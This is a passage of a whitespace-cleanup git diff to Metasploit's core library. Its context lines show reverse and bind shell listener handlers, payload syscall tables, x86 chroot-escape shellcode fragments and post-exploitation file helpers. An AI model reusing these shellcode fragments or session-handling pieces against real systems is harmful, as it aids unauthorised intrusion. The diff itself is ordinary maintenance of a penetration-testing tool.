Time.now.to_i - + while (stime + ctimeout > Time.now.to_i) begin client = Rex::Socket::Tcp.create( @@ -137,10 +137,10 @@ module BindTcp # Valid client connection? if (client) - + # Increment the has connection counter self.pending_connections += 1 - + # Start a new thread and pass the client connection # as the input and output pipe. Client's are expected # to implement the Stream interface. @@ -157,7 +157,7 @@ module BindTcp } end - # + # # Nothing to speak of. # def stop_handler diff --git a/lib/msf/core/handler/find_shell.rb b/lib/msf/core/handler/find_shell.rb index 7797aa37b9..6a34d9160b 100644 --- a/lib/msf/core/handler/find_shell.rb +++ b/lib/msf/core/handler/find_shell.rb @@ -38,9 +38,9 @@ module FindShell protected - + end end -end \ No newline at end of file +end diff --git a/lib/msf/core/handler/find_tag.rb b/lib/msf/core/handler/find_tag.rb index f079234924..d3c165d7f3 100644 --- a/lib/msf/core/handler/find_tag.rb +++ b/lib/msf/core/handler/find_tag.rb @@ -37,10 +37,10 @@ module FindTag register_advanced_options( [ - OptString.new('TAG', - [ - true, - "The four byte tag to signify the connection.", + OptString.new('TAG', + [ + true, + "The four byte tag to signify the connection.", Rex::Text.rand_text_alphanumeric(4), ]) ], Msf::Handler::FindTag) diff --git a/lib/msf/core/handler/find_tty.rb b/lib/msf/core/handler/find_tty.rb index 0fe299615e..03b8506689 100644 --- a/lib/msf/core/handler/find_tty.rb +++ b/lib/msf/core/handler/find_tty.rb @@ -45,7 +45,7 @@ protected return (sock.commandstate ? false : true) end return true - end + end end diff --git a/lib/msf/core/handler/none.rb b/lib/msf/core/handler/none.rb index cce7babfbe..61ec556865 100644 --- a/lib/msf/core/handler/none.rb +++ b/lib/msf/core/handler/none.rb @@ -8,7 +8,7 @@ module Handler ### module None include Msf::Handler - + # # Returns the handler type of none since payloads that use this handler # have no connection. @@ -27,4 +27,4 @@ module None end end -end \ No newline at end of file +end diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 0f099174e9..37a53e82b3 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -125,24 +125,24 @@ protected lhost = datastore['LHOST'] - - # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) if lhost.empty? or lhost == '0.0.0.0' lhost = Rex::Socket.source_address(cli.peerhost) end - + # Process the requested resource. case req.relative_resource when /^\/INITJM/ print_line("Java: #{req.relative_resource}") - + conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16) - url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" + url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00" print_line "URL: #{url.inspect}" - + blob = "" blob << obj.generate_stage - + # This is a TLV packet - I guess somewhere there should be API for building them # in Metasploit :-) packet = "" @@ -151,7 +151,7 @@ protected packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN') packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN') blob << [packet.length+8, 0].pack('NN') + packet - + resp.body = blob conn_ids << conn_id @@ -164,7 +164,7 @@ protected :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :ssl => false }) - + when /^\/A?INITM?/ print_line("Win32: #{req.relative_resource}") diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 4bf1f20d6d..5460f9cc7f 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb @@ -125,12 +125,12 @@ protected print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...") lhost = datastore['LHOST'] - - # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) + + # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance) if lhost.empty? or lhost == '0.0.0.0' lhost = Rex::Socket.source_address(cli.peerhost) end - + # Process the requested resource. case req.relative_resource when /^\/INITJM/ diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index 5e290fcbf8..9c5f26c8a8 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -45,7 +45,7 @@ module ReverseTcp [ Opt::LHOST, Opt::LPORT(4444) - ], Msf::Handler::ReverseTcp) + ], Msf::Handler::ReverseTcp) # XXX: Not supported by all modules register_advanced_options( @@ -55,7 +55,7 @@ module ReverseTcp OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), ], Msf::Handler::ReverseTcp) - + self.handler_queue = ::Queue.new end @@ -75,16 +75,16 @@ module ReverseTcp # First attempt to bind LHOST. If that fails, the user probably has # something else listening on that interface. Try again with ANY_ADDR. any = (addr.length == 4) ? "0.0.0.0" : "::0" - + addrs = [ Rex::Socket.addr_ntoa(addr), any ] - + comm = datastore['ReverseListenerComm'] if comm.to_s == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end - + if not datastore['ReverseListenerBindAddress'].to_s.empty? # Only try to bind to this specific interface addrs = [ datastore['ReverseListenerBindAddress'] ] @@ -105,12 +105,12 @@ module ReverseTcp 'MsfPayload' => self, 'MsfExploit' => assoc_exploit }) - + ex = false - + comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip ) comm_used = Rex::Socket::Comm::Local if comm_used == nil - + if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) ) via = "via the #{comm_used.type} on session #{comm_used.sid}" else @@ -124,7 +124,7 @@ module ReverseTcp print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") end } - raise ex if (ex) + raise ex if (ex) end # @@ -144,7 +144,7 @@ module ReverseTcp begin # Accept a client connection begin - client = self.listener_sock.accept + client = self.listener_sock.accept rescue wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}") break @@ -152,11 +152,11 @@ module ReverseTcp # Increment the has connection counter self.pending_connections += 1 - + self.handler_queue.push( client ) end while true } - + self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) { while true client = self.handler_queue.pop @@ -167,10 +167,10 @@ module ReverseTcp end end } - + end - # + # # Stops monitoring for an inbound connection. # def stop_handler @@ -185,7 +185,7 @@ module ReverseTcp self.handler_thread.kill self.handler_thread = nil end - + if (self.listener_sock) self.listener_sock.close self.listener_sock = nil diff --git a/lib/msf/core/handler/reverse_tcp_allports.rb b/lib/msf/core/handler/reverse_tcp_allports.rb index c1e5cc57af..120cc52997 100644 --- a/lib/msf/core/handler/reverse_tcp_allports.rb +++ b/lib/msf/core/handler/reverse_tcp_allports.rb @@ -24,7 +24,7 @@ module ReverseTcpAllPorts def self.handler_type return "reverse_tcp_allports" end - + # # Returns the connection-described general handler type, in this case # 'reverse'. @@ -32,7 +32,7 @@ module ReverseTcpAllPorts def self.general_handler_type "reverse" end - + # # Override the default port to be '1' # diff --git a/lib/msf/core/model/cred.rb b/lib/msf/core/model/cred.rb index c362911e33..3ba51c4a4e 100644 --- a/lib/msf/core/model/cred.rb +++ b/lib/msf/core/model/cred.rb @@ -14,7 +14,7 @@ class Cred < ActiveRecord::Base return false unless self.proof return false if self.proof.empty? key_id_regex = /[0-9a-fA-F:]+/ - my_key_id = self.proof[key_id_regex].to_s.downcase + my_key_id = self.proof[key_id_regex].to_s.downcase other_key_id = other.proof[key_id_regex].to_s.downcase my_key_id == other_key_id end diff --git a/lib/msf/core/model/host.rb b/lib/msf/core/model/host.rb index 5f5311cbc5..1ba7aa1e5f 100644 --- a/lib/msf/core/model/host.rb +++ b/lib/msf/core/model/host.rb @@ -21,10 +21,10 @@ class Host < ActiveRecord::Base validates_exclusion_of :address, :in => ['127.0.0.1'] validates_uniqueness_of :address, :scope => :workspace_id - def attribute_locked?(attr) - n = notes.find_by_ntype("host.updated.#{attr}") - n && n.data[:locked] - end + def attribute_locked?(attr) + n = notes.find_by_ntype("host.updated.#{attr}") + n && n.data[:locked] + end # Determine if the fingerprint data is readable. If not, it nearly always # means that there was a problem with the YAML or the Marshal'ed data, @@ -801,7 +801,7 @@ protected ret[:os_flavor] = "Windows 7" ret[:type] = "client" else - ret[:os_flavor] = data[:product].gsub("Windows", '').strip + ret[:os_flavor] = data[:product].gsub("Windows", '').strip ret[:os_sp] = data[:version] if data[:version] if data[:product] ret[:type] = "server" if data[:product][/Server/] diff --git a/lib/msf/core/model/macro.rb b/lib/msf/core/model/macro.rb index 64ef97dd98..df8d9399bc 100644 --- a/lib/msf/core/model/macro.rb +++ b/lib/msf/core/model/macro.rb @@ -4,7 +4,7 @@ class DBManager class Macro < ActiveRecord::Base include DBSave serialize :actions - serialize :prefs + serialize :prefs end end diff --git a/lib/msf/core/model/service.rb b/lib/msf/core/model/service.rb index 4f8de749be..dba6f96864 100644 --- a/lib/msf/core/model/service.rb +++ b/lib/msf/core/model/service.rb @@ -9,11 +9,11 @@ class Service < ActiveRecord::Base has_many :exploited_hosts, :dependent => :destroy has_many :web_sites, :dependent => :destroy belongs_to :host - + has_many :web_pages, :through => :web_sites has_many :web_forms, :through => :web_sites has_many :web_vulns, :through => :web_sites - + serialize :info def after_save diff --git a/lib/msf/core/model/web_site.rb b/lib/msf/core/model/web_site.rb index 8b8ed565ba..a79c6b5dde 100644 --- a/lib/msf/core/model/web_site.rb +++ b/lib/msf/core/model/web_site.rb @@ -7,9 +7,9 @@ class WebSite < ActiveRecord::Base has_many :web_pages, :dependent => :destroy has_many :web_forms, :dependent => :destroy has_many :web_vulns, :dependent => :destroy - + serialize :options - + def to_url(ignore_vhost=false) proto = self.service.name == "https" ? "https" : "http" host = ignore_vhost ? self.service.host.address : self.vhost @@ -20,19 +20,19 @@ class WebSite < ActiveRecord::Base end url end - + def page_count web_pages.size end - + def form_count web_forms.size end - + def vuln_count web_vulns.size - end - + end + end end diff --git a/lib/msf/core/module/auxiliary_action.rb b/lib/msf/core/module/auxiliary_action.rb index 34302be79d..44ee3fb83b 100644 --- a/lib/msf/core/module/auxiliary_action.rb +++ b/lib/msf/core/module/auxiliary_action.rb @@ -11,7 +11,7 @@ class Msf::Module::AuxiliaryAction # # Serialize from an array to an Action instance. # - def self.from_a(ary) + def self.from_a(ary) return nil if ary.nil? self.new(*ary) end diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 40f6f671a1..e1a29847a5 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -30,7 +30,7 @@ class Msf::Module::Platform name.split('::')[3 .. -1].each { |part| c = c.const_get(part) if (c.const_defined?('RealName') == true) - names << c.const_get('RealName') + names << c.const_get('RealName') else names << part end @@ -65,7 +65,7 @@ class Msf::Module::Platform # # Finds all inherited children from a given module. - # + # def self.find_children @subclasses ||= [] @subclasses.sort_by { |a| a::Rank } @@ -130,14 +130,14 @@ class Msf::Module::Platform # the string). # def self.find_portion(mod, str) - + # Check to see if we've built the abbreviated cache if (not ( mod.const_defined?('Abbrev') and mod.const_defined?('Names') and mod.const_defined?('Ranks') - ) ) - build_child_platform_abbrev(mod) + ) ) + build_child_platform_abbrev(mod) end if (not mod.const_defined?('Names')) @@ -145,7 +145,7 @@ class Msf::Module::Platform raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}") return nil end - + abbrev = mod.const_get('Abbrev') names = mod.const_get('Names') ranks = mod.const_get('Ranks') @@ -177,7 +177,7 @@ class Msf::Module::Platform if (best == nil) raise ArgumentError, "No classes in #{mod} for #{str}!", caller end - + return best end @@ -189,7 +189,7 @@ class Msf::Module::Platform # Builtin platforms # ## - + # # Windows # @@ -438,7 +438,7 @@ class Msf::Module::Platform Rank = 100 Alias = "aix" end - + # # HP-UX # @@ -446,7 +446,7 @@ class Msf::Module::Platform Rank = 100 Alias = "hpux" end - + # # Irix # @@ -454,7 +454,7 @@ class Msf::Module::Platform Rank = 100 Alias = "irix" end - + # # Generic Unix # @@ -462,12 +462,12 @@ class Msf::Module::Platform Rank = 100 Alias = "unix" end - + # # Generic PHP # class PHP < Msf::Module::Platform Rank = 100 Alias = "php" - end + end end diff --git a/lib/msf/core/module/reference.rb b/lib/msf/core/module/reference.rb index d1298ea13e..32293a77ae 100644 --- a/lib/msf/core/module/reference.rb +++ b/lib/msf/core/module/reference.rb @@ -106,7 +106,7 @@ class Msf::Module::SiteReference < Msf::Module::Reference elsif (in_ctx_id == 'US-CERT-VU') self.site = 'http://www.kb.cert.org/vuls/id/' + in_ctx_val.to_s elsif (in_ctx_id == 'BPS') - self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s + self.site = 'https://strikecenter.bpointsys.com/bps/advisory/BPS-' + in_ctx_val.to_s elsif (in_ctx_id == 'URL') self.site = in_ctx_val.to_s else diff --git a/lib/msf/core/module/target.rb b/lib/msf/core/module/target.rb index 70f2149af7..dfc4409e3c 100644 --- a/lib/msf/core/module/target.rb +++ b/lib/msf/core/module/target.rb @@ -31,7 +31,7 @@ class Msf::Module::Target # def start_addresses if (self['Start'] and self['Start'].kind_of?(Hash) == false) - return {'Address' => self['Start'] } + return {'Address' => self['Start'] } else return self['Start'] end @@ -43,7 +43,7 @@ class Msf::Module::Target # def stop_addresses if (self['Stop'] and self['Stop'].kind_of?(Hash) == false) - return {'Address' => self['Stop'] } + return {'Address' => self['Stop'] } else return self['Stop'] end @@ -136,9 +136,9 @@ class Msf::Module::Target self.save_registers = opts['SaveRegisters'] self.ret = opts['Ret'] self.opts = opts - + if (opts['Arch']) - self.arch = Rex::Transformer.transform(opts['Arch'], Array, + self.arch = Rex::Transformer.transform(opts['Arch'], Array, [ String ], 'Arch') end @@ -210,7 +210,7 @@ class Msf::Module::Target def payload_max_nops opts['Payload'] ? opts['Payload']['MaxNops'] : nil end - + # # Payload min nops information for this target. # @@ -287,4 +287,4 @@ protected attr_writer :name, :platform, :arch, :opts, :ret, :save_registers # :nodoc: attr_writer :bruteforce # :nodoc: -end \ No newline at end of file +end diff --git a/lib/msf/core/module/target.rb.ut.rb b/lib/msf/core/module/target.rb.ut.rb index 59169fcb9e..2b5c79f612 100644 --- a/lib/msf/core/module/target.rb.ut.rb +++ b/lib/msf/core/module/target.rb.ut.rb @@ -11,7 +11,7 @@ class Module::Target::UnitTest < Test::Unit::TestCase def test_target t = Target.from_a(['Universal', { 'Platform' => 'winxpsp0', - 'Ret' => 0x12345678 + 'Ret' => 0x12345678 }]) assert_equal('Universal', t.name) @@ -22,4 +22,4 @@ class Module::Target::UnitTest < Test::Unit::TestCase end end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/aix.rb b/lib/msf/core/payload/aix.rb index 65d6490c19..d1eb3fffe7 100644 --- a/lib/msf/core/payload/aix.rb +++ b/lib/msf/core/payload/aix.rb @@ -46,7 +46,7 @@ module Msf::Payload::Aix # # NOTE: - # + # # To add a syscall set, add a aix_XXXX_syscalls hash as seen below, # and add a line to the versions hash using that version. # @@ -62,7 +62,7 @@ module Msf::Payload::Aix :__NR_close => 278, :__NR_kfcntl => 658 } - + aix_613_syscalls = { :__NR_execve => 7, :__NR_getpeername => 205, @@ -74,7 +74,7 @@ module Msf::Payload::Aix :__NR_close => 272, :__NR_kfcntl => 644 } - + aix_612_syscalls = { :__NR_execve => 7, :__NR_getpeername => 205, @@ -86,7 +86,7 @@ module Msf::Payload::Aix :__NR_close => 272, :__NR_kfcntl => 635 } - + aix_611_syscalls = { :__NR_execve => 7, :__NR_getpeername => 202, @@ -98,7 +98,7 @@ module Msf::Payload::Aix :__NR_close => 269, :__NR_kfcntl => 614 } - + aix_610_syscalls = { :__NR_execve => 6, :__NR_getpeername => 203, @@ -110,7 +110,7 @@ module Msf::Payload::Aix :__NR_close => 269, :__NR_kfcntl => 617 } - + aix_53x_syscalls = { :__NR_execve => 6, :__NR_getpeername => 198, @@ -122,7 +122,7 @@ module Msf::Payload::Aix :__NR_close => 245, :__NR_kfcntl => 493 } - + aix_51_syscalls = { :__NR_execve => 5, :__NR_getpeername => 122, diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index 44224397a1..d3555f41ff 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -2,7 +2,7 @@ require 'msf/core' module Msf::Payload::Java - # + # # Used by stages; all java stages need to define +@stage_class_files+ as an # array of .class files located in data/java/ # diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index 6af062155f..77f56462a2 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -108,7 +108,7 @@ module Msf::Payload::Linux "\x6a\x46" +# pushl $0x46 # "\x58" +# popl %eax # "\xcd\x80" # int $0x80 # - + # break chroot pre << "\x6a\x3d" +# pushl $0x3d # # build dir str (ptr in ebx) @@ -138,7 +138,7 @@ module Msf::Payload::Linux "\x58" +# popl %eax # "\xcd\x80" # int $0x80 # end - + # Append if (datastore['AppendExit']) @@ -190,7 +190,7 @@ module Msf::Payload::Linux "\x7c\x63\x1a\x78" +# xor r3,r3,r3 # "\x38\x1f\xfe\x47" +# addi r0,r31,-441 # "\x44\xff\xff\x02" # sc # - + # EEK! unsupported... end diff --git a/lib/msf/core/payload/netware.rb b/lib/msf/core/payload/netware.rb index 9ce41f475b..7e65c72956 100644 --- a/lib/msf/core/payload/netware.rb +++ b/lib/msf/core/payload/netware.rb @@ -16,18 +16,18 @@ module Msf::Payload::Netware # # Returns a list of compatible encoders based on architecture - # fnstenv does not work on NetWare + # fnstenv does not work on NetWare # def compatible_encoders encoders = super() - encoders2 = [] - + encoders2 = [] + encoders.each { |encname, encmod| - if (!encname.include?('fnstenv_mov') && !encname.include?('shikata_ga_nai')) - encoders2 << [ encname, encmod ] - end + if (!encname.include?('fnstenv_mov') && !encname.include?('shikata_ga_nai')) + encoders2 << [ encname, encmod ] + end } - + return encoders2; end -end \ No newline at end of file +end diff --git a/lib/msf/core/payload/single.rb b/lib/msf/core/payload/single.rb index bdef8e5094..4ecbd66be4 100644 --- a/lib/msf/core/payload/single.rb +++ b/lib/msf/core/payload/single.rb @@ -2,7 +2,7 @@ require 'msf/core' ### # -# Base mixin interface for use by single payloads. Single +# Base mixin interface for use by single payloads. Single # payloads are differentiated from stagers and stages by the # fact that they run as part of the first stage and have # no subsequent stages. @@ -41,4 +41,4 @@ module Msf::Payload::Single end end -end \ No newline at end of file +end diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 46110fe06c..5da2f65177 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -75,7 +75,7 @@ module File else data = session.shell_command_token("cat \'#{file_name}\'") end - + end data end @@ -95,11 +95,11 @@ module File else session.shell_command_token("echo \'#{data}\' > \'#{file_name}\'") end - + end return true end - + # # Platform-agnostic file append. Appends given object content to a remote file. # Returns Boolean true if successful @@ -118,7 +118,7 @@ module File end return true end - + protected # diff --git a/lib/msf/core/rpc/auth.rb b/lib/msf/core/rpc/auth.rb index 2b30684396..67b3e63235 100644 --- a/lib/msf/core/rpc/auth.rb +++ b/lib/msf/core/rpc/auth.rb @@ -3,7 +3,7 @@ module RPC class Auth < Base def login(user,pass) - + # handle authentication here fail = true @users.each do |u| @@ -12,21 +12,21 @@ class Auth < Base break end end - + if fail # Introduce a random delay in the response to annoy brute forcers delay = [ ( rand(3000) / 1000.0 ), 0.50 ].max ::IO.select(nil, nil, nil, delay) - + # Send back a 401 denied error raise ::XMLRPC::FaultException.new(401, "authentication error") end - + token = Rex::Text.rand_text_alphanumeric(32) @tokens[token] = [user, Time.now.to_i, Time.now.to_i] { "result" => "success", "token" => token } end - + def logout(token) @tokens.delete(token) { "result" => "success" } diff --git a/lib/msf/core/rpc/base.rb b/lib/msf/core/rpc/base.rb index 0968cb3ccd..257bcd4685 100644 --- a/lib/msf/core/rpc/base.rb +++ b/lib/msf/core/rpc/base.rb @@ -10,12 +10,12 @@ class Base private - def authenticate(token) + def authenticate(token) stale = [] - + # Force the encoding to ASCII-8BIT token = token.unpack("C*").pack("C*") - + @tokens.each_key do |t| user,ctime,mtime,perm = @tokens[t] if ! perm and mtime + 300 < Time.now.to_i diff --git a/lib/msf/core/rpc/db.rb b/lib/msf/core/rpc/db.rb index 3c7086e728..e67faa9882 100644 --- a/lib/msf/core/rpc/db.rb +++ b/lib/msf/core/rpc/db.rb @@ -3,13 +3,13 @@ module RPC class Db < Base private - def db + def db @framework.db.active end def workspace(wspace = nil) - if(wspace and wspace != "") - return @framework.db.find_workspace(wspace) + if(wspace and wspace != "") + return @framework.db.find_workspace(wspace) end @framework.db.workspace end @@ -23,7 +23,7 @@ private end def opts_to_hosts(opts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address] @@ -42,7 +42,7 @@ private end def opts_to_services(hosts,opts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) services = [] if opts[:host] or opts[:address] or opts[:addresses] return services if hosts.count < 1 @@ -73,7 +73,7 @@ private def clean_nils(obj) return '' if obj == nil if obj.is_a? Hash - obj.each_key do |key| + obj.each_key do |key| obj[key] = clean_nils(obj[key]) end elsif obj.is_a? Array @@ -161,7 +161,7 @@ public end return ret if (not services) - + services.each do |s| service = {} host = s.host @@ -220,7 +220,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array end - + #get list of vulns if services.count > 0 services.each do |s| @@ -253,7 +253,7 @@ public vulns.each do |v| vuln = {} reflist = v.refs.map { |r| r.name } - if(v.service) + if(v.service) vuln[:port] = v.service.port vuln[:proto] = v.service.proto else @@ -261,7 +261,7 @@ public vuln[:proto] = nil end vuln[:time] = v.created_at.to_i - vuln[:host] = v.host.address || v.host.address6 || nil + vuln[:host] = v.host.address || v.host.address6 || nil vuln[:name] = v.name vuln[:refs] = reflist.join(',') ret[:vulns] << vuln @@ -373,7 +373,7 @@ public host[:info] = h.info.to_s ret[:host] << host end - ret + ret end def report_host(token,xopts) @@ -385,7 +385,7 @@ public res = @framework.db.report_host(opts) return { :result => 'success' } if(res) { :result => 'failed' } - + end def report_service(token,xopts) @@ -430,7 +430,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array - + services.each do |s| service = {} host = s.host @@ -546,7 +546,7 @@ public service = host.services.find_by_proto_and_port(opts[:proto],opts[:port]) if host.services.count > 0 opts[:service] = service if service end - + res = @framework.db.report_note(opts) return { :result => 'success' } if(res) { :result => 'failed' } @@ -593,7 +593,7 @@ public services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array end - + #get list of notes if services.count > 0 services.each do |s| @@ -660,7 +660,7 @@ public i.each do |k,v| info[k.to_sym] = v end - ret[:auth_info] << info + ret[:auth_info] << info end ret end @@ -674,11 +674,11 @@ public authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] services = [] vulns = [] - + if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end @@ -734,21 +734,21 @@ public dent[:proto] = v.service.proto if v.service dent[:name] = v.name deleted << dent - v.destroy + v.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def del_note(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] services = [] notes = [] - + if opts[:host] or opts[:address] or opts[:addresses] hosts = opts_to_hosts(opts) end @@ -803,17 +803,17 @@ public dent[:proto] = n.service.proto if n.service dent[:ntype] = n.ntype deleted << dent - n.destroy + n.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def del_service(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] services = [] if opts[:host] or opts[:address] @@ -852,9 +852,9 @@ public services << sret if sret and sret.class == Msf::DBManager::Service services |= sret if sret and sret.class == Array end - - - + + + deleted = [] services.each do |s| dent = {} @@ -862,17 +862,17 @@ public dent[:port] = s.port dent[:proto] = s.proto deleted << dent - s.destroy + s.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end def del_host(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] if opts[:host] or opts[:address] host = opts[:host] || opts[:address] @@ -890,10 +890,10 @@ public deleted = [] hosts.each do |h| deleted << h.address.to_s - h.destroy + h.destroy end - - return { :result => 'success', :deleted => deleted } + + return { :result => 'success', :deleted => deleted } end @@ -922,8 +922,8 @@ public event[:created_at] = e.created_at.to_i event[:updated_at] = e.updated_at.to_i event[:name] = e.name - event[:critical] = e.critical if(e.critical) - event[:username] = e.username if(e.username) + event[:critical] = e.critical if(e.critical) + event[:username] = e.username if(e.username) event[:info] = e.info ret[:events] << event end @@ -963,7 +963,7 @@ public loot = {} loot[:host] = l.host.address || l.host.address6 if(l.host) loot[:service] = l.service.name || l.service.port if(l.service) - loot[:ltype] = l.ltype + loot[:ltype] = l.ltype loot[:content_type] = l.content_type loot[:data] = l.data if (l.data) loot[:created_at] = l.created_at.to_i @@ -985,7 +985,7 @@ public return { :result => 'success' } if(res) { :result => 'failed' } end - + #right now workspace is the only option supported def creds(token,xopts) authenticate(token) @@ -1009,7 +1009,7 @@ public end ret end - + def import_data(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1019,7 +1019,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_msfe_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1029,7 +1029,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nexpose_simplexml(args={}) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1039,7 +1039,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nexpose_rawxml(args={}) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1049,7 +1049,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nmap_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1059,7 +1059,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nessus_nbe(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1069,7 +1069,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nessus_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1079,7 +1079,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_nessus_xml_v2(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1089,7 +1089,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_qualys_xml(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1099,7 +1099,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_ip_list(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1109,7 +1109,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_amap_log(args={}) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1119,7 +1119,7 @@ public @framework.db.import(opts) return { :result => 'success' } end - + def import_amap_mlog(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) @@ -1151,7 +1151,7 @@ public return ret if sret == nil services << sret if sret.class == Msf::DBManager::Service services |= sret if sret.class == Array - + services.each do |s| vulns |= s.vulns end @@ -1160,7 +1160,7 @@ public end return ret if (not vulns) - + vulns.each do |v| vuln= {} host= v.host @@ -1176,18 +1176,18 @@ public vuln[:refs] = [] v.refs.each do |r| vuln[:refs] << r.name - end + end ret[:vuln] << vuln end ret end - + def clients(token,xopts) authenticate(token) raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] clients = [] ret = {} @@ -1201,7 +1201,7 @@ public hosts.each do |h| cret = nil - if opts[:ua_name] or opts[:ua_ver] + if opts[:ua_name] or opts[:ua_ver] conditions = {} conditions[:ua_name] = opts[:ua_name] if opts[:ua_name] conditions[:ua_ver] = opts[:ua_ver] if opts[:ua_ver] @@ -1231,7 +1231,7 @@ public raise ::XMLRPC::FaultException.new(404, "database not loaded") if(not db) opts = fix_options(xopts) - wspace = workspace(opts[:workspace]) + wspace = workspace(opts[:workspace]) hosts = [] clients = [] @@ -1243,7 +1243,7 @@ public hosts.each do |h| cret = nil - if opts[:ua_name] or opts[:ua_ver] + if opts[:ua_name] or opts[:ua_ver] conditions = {} conditions[:ua_name] = opts[:ua_name] if opts[:ua_name] conditions[:ua_ver] = opts[:ua_ver] if opts[:ua_ver] @@ -1262,11 +1262,11 @@ public dent[:address] = c.host.address.to_s dent[:ua_string] = c.ua_string deleted << dent - c.destroy + c.destroy end - return { :result => 'success', :deleted => deleted } - + return { :result => 'success', :deleted => deleted } + end def driver(token,xopts) @@ -1300,7 +1300,7 @@ public return { :result => 'failed' } end end - + driver = @framework.db.driver case driver @@ -1309,12 +1309,12 @@ public else return { :result => 